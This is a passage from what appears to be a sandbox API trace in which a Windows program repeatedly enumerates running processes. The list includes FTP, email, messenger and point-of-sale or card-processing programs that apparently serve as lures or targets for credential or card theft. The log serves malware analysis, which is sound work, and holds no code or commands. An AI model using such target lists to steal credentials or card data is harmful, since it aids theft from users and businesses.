cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0196.752] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0196.753] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0196.755] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0196.757] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0196.759] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0196.760] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0196.916] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0196.918] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0196.920] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0196.922] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0196.924] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0196.925] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0196.927] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0196.930] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0196.933] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0196.935] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0196.938] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0196.940] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0196.942] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0196.944] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0196.946] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0196.948] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0197.312] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0197.315] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0197.317] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0197.319] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0197.321] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0197.323] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0197.326] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0197.328] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0197.330] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0197.332] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0197.334] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0197.336] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0197.338] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0197.366] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0197.369] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0197.482] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0197.484] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0197.485] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0197.487] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0197.489] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0197.491] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0197.492] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0197.494] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0197.499] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0197.501] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0197.502] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0197.504] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0197.506] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0197.508] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0197.509] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0197.530] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0197.532] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0197.536] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0197.538] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0197.540] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xccc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x500, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0197.542] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xccc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x500, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 0 [0197.546] CloseHandle (hObject=0x228c) returned 1 [0197.546] Sleep (dwMilliseconds=0x64) [0197.718] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2224 [0197.734] Process32First (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0197.737] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0197.739] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0197.741] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0197.743] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0197.749] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0197.751] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0197.753] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0197.755] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0197.757] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.766] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.768] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0197.770] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.772] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.774] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.780] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.782] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.785] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.787] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.789] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0197.791] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0197.797] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0197.799] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.801] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0197.803] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0197.805] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: 